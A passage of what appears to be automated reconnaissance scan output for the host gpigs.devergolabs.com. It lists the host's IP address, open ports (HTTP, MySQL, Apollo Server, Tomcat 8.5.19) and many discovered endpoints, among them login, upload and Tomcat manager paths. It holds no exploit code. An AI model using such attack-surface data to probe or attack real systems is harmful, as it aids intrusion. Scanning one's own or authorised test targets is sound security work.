'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/notes', 'method': 'GET', 'technology': 'Bootstrap', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/info', 'method': 'GET', 'technology': 'Bootstrap', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/upload', 'method': 'POST', 'technology': 'Bootstrap', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/upload', 'method': 'GET', 'technology': 'Bootstrap', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/uploads', 'method': 'GET', 'technology': 'Bootstrap', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/static', 'method': 'GET', 'technology': 'Bootstrap', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/js', 'method': 'GET', 'technology': 'Bootstrap', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/index.html', 'method': 'GET', 'technology': 'Bootstrap', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/css', 'method': 'GET', 'technology': 'Bootstrap', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/js/true/', 'method': 'GET', 'technology': 'Bootstrap', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/js/g', 'method': 'GET', 'technology': 'Bootstrap', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/js/binary/', 'method': 'GET', 'technology': 'Bootstrap', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/users', 'method': 'POST', 'technology': 'Bootstrap', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/users', 'method': 'GET', 'technology': 'Bootstrap', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/login', 'method': 'POST', 'technology': 'Bootstrap', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/login', 'method': 'GET', 'technology': 'Bootstrap', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/', 'method': 'GET', 'technology': 'Bootstrap', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/Upload', 'method': 'POST', 'technology': 'AngularJS', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/notes', 'method': 'GET', 'technology': 'AngularJS', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/info', 'method': 'GET', 'technology': 'AngularJS', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/upload', 'method': 'POST', 'technology': 'AngularJS', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/upload', 'method': 'GET', 'technology': 'AngularJS', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/uploads', 'method': 'GET', 'technology': 'AngularJS', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/static', 'method': 'GET', 'technology': 'AngularJS', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/js', 'method': 'GET', 'technology': 'AngularJS', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/index.html', 'method': 'GET', 'technology': 'AngularJS', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/css', 'method': 'GET', 'technology': 'AngularJS', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/js/true/', 'method': 'GET', 'technology': 'AngularJS', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/js/g', 'method': 'GET', 'technology': 'AngularJS', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/js/binary/', 'method': 'GET', 'technology': 'AngularJS', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/users', 'method': 'POST', 'technology': 'AngularJS', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/users', 'method': 'GET', 'technology': 'AngularJS', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/login', 'method': 'POST', 'technology': 'AngularJS', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/api/v2/login', 'method': 'GET', 'technology': 'AngularJS', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 80, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http', 'service_product': 'Node.js Express framework', 'service_version': '', 'base_url': 'http://gpigs.devergolabs.com', 'http_status': 200, 'page_title': None, 'endpoint_path': '/', 'method': 'GET', 'technology': 'AngularJS', 'tech_version': ''}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 3306, 'protocol': 'tcp', 'port_state': 'open', 'service': 'mysql', 'service_product': 'MySQL', 'service_version': '8.4.8', 'base_url': None, 'http_status': None, 'page_title': None, 'endpoint_path': None, 'method': None, 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 4000, 'protocol': 'tcp', 'port_state': 'open', 'service': 'terabase', 'service_product': None, 'service_version': None, 'base_url': 'http://gpigs.devergolabs.com:4000', 'http_status': 200, 'page_title': 'Apollo Server', 'endpoint_path': '/', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/config/jar-scan-filter.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs;/config/listeners.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs;/jndi-datasource-examples-howto.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs;/jdbc-pool.html', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/user', 'method': 'POST', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/appdev/sample', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/images', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/config', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/architecture', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs/api', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/users', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/testing', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/task', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/resources', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/public', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/product', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/post', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/page', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/messages', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/manager', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/logout', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/host-manager', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/favicon.ico', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/examples', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/email', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/documents', 'method': 'POST', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/documents', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs', 'method': 'PATCH', 'technology': None, 'tech_version': None}, {'domain': 'devergolabs.com', 'subdomain': 'gpigs.devergolabs.com', 'subdomain_status': '200', 'ip': '15.160.68.117', 'country': None, 'port': 8080, 'protocol': 'tcp', 'port_state': 'open', 'service': 'http-proxy', 'service_product': 'Apache Tomcat', 'service_version': '8.5.19', 'base_url': 'http://gpigs.devergolabs.com:8080', 'http_status': 200, 'page_title': 'Apache Tomcat/8.5.19', 'endpoint_path': '/docs', 'method': 'GET', 'technology': None, 'tech_version': None}, {'domain': 